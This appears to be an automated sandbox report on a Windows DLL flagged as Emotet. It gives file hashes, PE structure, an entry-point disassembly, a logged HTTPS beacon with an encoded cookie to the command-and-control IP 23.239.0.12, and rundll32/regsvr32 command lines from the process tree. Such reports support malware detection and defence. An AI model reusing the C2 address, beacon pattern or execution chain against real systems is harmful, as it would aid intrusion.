                                                                                                                                    SHA-256:57858C0A6694BBA1694B99A95FE3261F3FB482F08BDBE960F404010641B95544
                                                                                                                                    SHA-512:ACFB9CA25D66D17A8E1567BDFB8B3B3E9BC28E355C7FB68A57686F7E2CF04DC6FEA3EAFE20C884FDBAAAA59674849FC9C5458116EC49D0EFE06A0C3F2F9371EB
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.G#... ................e.f.3...w........................)..........z..2....z..h.(..........z....)..............3...w...........................................................................................................B...........@...................................................................................................... ............................................................................................................................................................................................................................................................z..................S.._.....z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):16384
                                                                                                                                    Entropy (8bit):0.07627575078568044
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:jAiR7vXyLfFljIllXDjll3Vkttlmlnl:1RrPLZ3
                                                                                                                                    MD5:AD46B3D923621A198E18F59602FA3B1B
                                                                                                                                    SHA1:1D2E0C2C0E697D4B13988E027952564187CDB04C
                                                                                                                                    SHA-256:3009B982A7C478943DEAC8FCEE47B58FB2E5019EC01AFB72AFD72E66AE63471C
                                                                                                                                    SHA-512:68EC29BB422D2448E68205E6DBBDA421C03BB5878AE3504AA8A63DBA73C053D3D6AE0DB174D5ABEAF4469209CED78DFE582DAFF8DEC8CD2A139F9BD172AE8A0F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.;z......................................3...w..2....z.......z...............z.......z..`%.......z..................S.._.....z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):55
                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):10844
                                                                                                                                    Entropy (8bit):3.1623573157832574
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+Ewx+m:j+s+i+Z+z+B+c+Y+0g+J+j+1+m
                                                                                                                                    MD5:2DBAD0BEF1FA818AA001A84E8CBF9285
                                                                                                                                    SHA1:FF53E14E5BBC3CED407D6FF085B4A74E568A7E18
                                                                                                                                    SHA-256:269D4E02BB4FB866D1319CF883B6FA735BC4542ED64A446C466909942E01BAB8
                                                                                                                                    SHA-512:11828F5E49890637768BF83EF9E5B44E9EFC187CF319A48D24D3D0BBEF5A976688EDD1BE7EED5CFE63CB91AAD39AF48A63AA1C3E91F126529ECD4998B80670FE
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                    Entropy (8bit):6.482090630678764
                                                                                                                                    TrID:
                                                                                                                                    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                                    • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                                    • DOS Executable Generic (2002/1) 1.70%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                    File name:1V4gPPcQvB.dll
                                                                                                                                    File size:545280
                                                                                                                                    MD5:571f80cb1a81eddf1fb399a4cd96582c
                                                                                                                                    SHA1:9e12d3add0890234365af3ea43e94ec9b271aaa1
                                                                                                                                    SHA256:c117963618d01c8c1b37a8dbc31409318e343ae03493569bfa6d66e0ebdf8dbd
                                                                                                                                    SHA512:c17ffc3ab5c68a2371eb0b92063294756b0df3f235caa18bea538082feb6126202d9389cd2bd362b77ad8ec84b371f33e63879756d07fc2ea99ab80bc48ee4b5
                                                                                                                                    SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZTHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVH
                                                                                                                                    TLSH:47C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                                                                                    Icon Hash:74f0e4ecccdce0e4
                                                                                                                                    Entrypoint:0x1800423a8
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x180000000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                    Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:5
                                                                                                                                    OS Version Minor:2
                                                                                                                                    File Version Major:5
                                                                                                                                    File Version Minor:2
                                                                                                                                    Subsystem Version Major:5
                                                                                                                                    Subsystem Version Minor:2
                                                                                                                                    Import Hash:b268dbaa2e6eb6acd16e04d482356598
                                                                                                                                    Instruction
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+08h], ebx
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+10h], esi
                                                                                                                                    push edi
                                                                                                                                    dec eax
                                                                                                                                    sub esp, 20h
                                                                                                                                    dec ecx
                                                                                                                                    mov edi, eax
                                                                                                                                    mov ebx, edx
                                                                                                                                    dec eax
                                                                                                                                    mov esi, ecx
                                                                                                                                    cmp edx, 01h
                                                                                                                                    jne 00007FF974D49EF7h
                                                                                                                                    call 00007FF974D4C084h
                                                                                                                                    dec esp
                                                                                                                                    mov eax, edi
                                                                                                                                    mov edx, ebx
                                                                                                                                    dec eax
                                                                                                                                    mov ecx, esi
                                                                                                                                    dec eax
                                                                                                                                    mov ebx, dword ptr [esp+30h]
                                                                                                                                    dec eax
                                                                                                                                    mov esi, dword ptr [esp+38h]
                                                                                                                                    dec eax
                                                                                                                                    add esp, 20h
                                                                                                                                    pop edi
                                                                                                                                    jmp 00007FF974D49DA0h
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+08h], ecx
                                                                                                                                    dec eax
                                                                                                                                    sub esp, 00000088h
                                                                                                                                    dec eax
                                                                                                                                    lea ecx, dword ptr [00014D05h]
                                                                                                                                    call dword ptr [0000FC7Fh]
                                                                                                                                    dec esp
                                                                                                                                    mov ebx, dword ptr [00014DF0h]
                                                                                                                                    dec esp
                                                                                                                                    mov dword ptr [esp+58h], ebx
                                                                                                                                    inc ebp
                                                                                                                                    xor eax, eax
                                                                                                                                    dec eax
                                                                                                                                    lea edx, dword ptr [esp+60h]
                                                                                                                                    dec eax
                                                                                                                                    mov ecx, dword ptr [esp+58h]
                                                                                                                                    call 00007FF974D58A7Ah
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+50h], eax
                                                                                                                                    dec eax
                                                                                                                                    cmp dword ptr [esp+50h], 00000000h
                                                                                                                                    je 00007FF974D49F33h
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+38h], 00000000h
                                                                                                                                    dec eax
                                                                                                                                    lea eax, dword ptr [esp+48h]
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+30h], eax
                                                                                                                                    dec eax
                                                                                                                                    lea eax, dword ptr [esp+40h]
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+28h], eax
                                                                                                                                    dec eax
                                                                                                                                    lea eax, dword ptr [00014CB0h]
                                                                                                                                    dec eax
                                                                                                                                    mov dword ptr [esp+20h], eax
                                                                                                                                    dec esp
                                                                                                                                    mov ecx, dword ptr [esp+50h]
                                                                                                                                    dec esp
                                                                                                                                    mov eax, dword ptr [esp+58h]
                                                                                                                                    dec eax
                                                                                                                                    mov edx, dword ptr [esp+60h]
                                                                                                                                    xor ecx, ecx
                                                                                                                                    call 00007FF974D58A28h
                                                                                                                                    jmp 00007FF974D49F14h
                                                                                                                                    dec eax
                                                                                                                                    mov eax, dword ptr [eax+eax+00000000h]
                                                                                                                                    Programming Language:
                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                    • [EXP] VS2008 build 21022
                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x520000x3d5f0x3e00False0.355405745968data5.39218584631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                    .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                    RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                                                                                    RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                                                                                    ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
                                                                                                                                    NameOrdinalAddress
                                                                                                                                    DllRegisterServer10x180042050
                                                                                                                                    DllUnregisterServer20x180042080
                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    May 14, 2022 05:14:51.468854904 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:51.468904018 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    May 14, 2022 05:14:51.469100952 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:51.494986057 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:51.495014906 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    May 14, 2022 05:14:52.039237022 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    May 14, 2022 05:14:52.042095900 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:52.549948931 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:52.549968004 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    May 14, 2022 05:14:52.550399065 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    May 14, 2022 05:14:52.551075935 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:52.575092077 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:52.616496086 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    May 14, 2022 05:14:53.417742968 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    May 14, 2022 05:14:53.417864084 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    May 14, 2022 05:14:53.417918921 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:53.417962074 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:53.455240965 CEST49763443192.168.2.423.239.0.12
                                                                                                                                    May 14, 2022 05:14:53.455270052 CEST4434976323.239.0.12192.168.2.4
                                                                                                                                    • 23.239.0.12
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.44976323.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2022-05-14 03:14:52 UTC0OUTGET / HTTP/1.1
                                                                                                                                    Cookie: hIRJjqHMHdV=nZwxi8WPWIMXNXTCUv3V5ewCiVaqak0UnFrOh9HPxFaBO28go/9+xWRpiaD+OvdLdpaS3KmMe0NROXF7P/v2uFUR2mdZcEYfCsU7esjRj8UoaBpR90xnOAMLNZb4Zf/GkJR+k0zKRYQ4snDyWIl1vlaP/fyz8s1xkPFTUva4UqN6kwBO8dE+yFUfheBRQWksHoH2WbfRu/bRMIQmJ6ipsT+oAAYPWV1JFEYVPpdNR6o=
                                                                                                                                    Host: 23.239.0.12
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2022-05-14 03:14:53 UTC0INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Sat, 14 May 2022 03:14:53 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    2022-05-14 03:14:53 UTC0INData Raw: 32 61 32 0d 0a 3f 86 f2 80 c6 07 0e 5a d0 33 9d 9d bc bf fd da e8 a9 48 a3 cf 77 09 62 2c d1 08 d9 76 b8 11 af f2 34 8e 18 94 d0 87 a7 a3 20 42 30 a9 63 29 5a 4f 32 01 12 cc a0 e5 c1 b4 f6 ce 83 b3 80 54 a0 28 90 55 d6 ee 6a 84 35 15 bc f9 aa d1 54 c3 a8 bf 23 15 14 a9 d2 23 b9 49 58 e0 a8 f7 07 46 f9 4b 81 1b f8 2e 56 1f cc 24 6e 95 a8 a5 00 de 1b d7 06 50 1d 5e 94 0f d3 53 dd ce 28 97 22 7d 5c b6 0a c4 c5 ee 40 72 c6 62 4e 05 4a f3 68 7d f7 c7 3c 2d 10 30 aa 13 cc 5a 82 d3 56 15 b2 74 aa ed 8e c6 d8 c4 a8 bc fe 2c 2b cd 8a 67 4c 45 59 9c 4b 93 2b 96 24 f0 e5 c0 1d 86 70 0d 8f cb 6a 70 58 87 e5 22 ec 1d 0e 82 55 d3 66 c8 93 66 5e 83 0b f0 7b a1 30 05 bd 67 9e ea fc 86 9b 4f 9e 54 3c cc f3 41 a7 52 52 e9 6a 9c ce 02 c9 c1 8b 3c f7 0d 93 dc ae f8 a0 a0 35
                                                                                                                                    Data Ascii: 2a2?Z3Hwb,v4 B0c)ZO2T(Uj5T##IXFK.V$nP^S("}\@rbNJh}<-0ZVt,+gLEYK+$pjpX"Uff^{0gOT<ARRj<5


                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:05:14:19
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\loaddll64.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:loaddll64.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll"
                                                                                                                                    Imagebase:0x7ff6294d0000
                                                                                                                                    File size:140288 bytes
                                                                                                                                    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:05:14:20
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1
                                                                                                                                    Imagebase:0x7ff7bb450000
                                                                                                                                    File size:273920 bytes
                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:05:14:20
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\1V4gPPcQvB.dll
                                                                                                                                    Imagebase:0x7ff68d6a0000
                                                                                                                                    File size:24064 bytes
                                                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.266871028.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:05:14:20
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1
                                                                                                                                    Imagebase:0x7ff7bca70000
                                                                                                                                    File size:69632 bytes
                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.265168643.0000023396DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.264935281.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:05:14:20
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\1V4gPPcQvB.dll,DllRegisterServer
                                                                                                                                    Imagebase:0x7ff7bca70000
                                                                                                                                    File size:69632 bytes
                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.264939318.0000020701410000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:05:14:25
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\1V4gPPcQvB.dll,DllUnregisterServer
                                                                                                                                    Imagebase:0x7ff7bca70000
                                                                                                                                    File size:69632 bytes
                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:05:14:25
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvcDyJjJQ\NcAvRfvDRbwLFn.dll"
                                                                                                                                    Imagebase:0x7ff68d6a0000
                                                                                                                                    File size:24064 bytes
                                                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.649155251.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:05:14:35
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:11
                                                                                                                                    Start time:05:14:37
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:12
                                                                                                                                    Start time:05:14:38
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:05:14:39
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
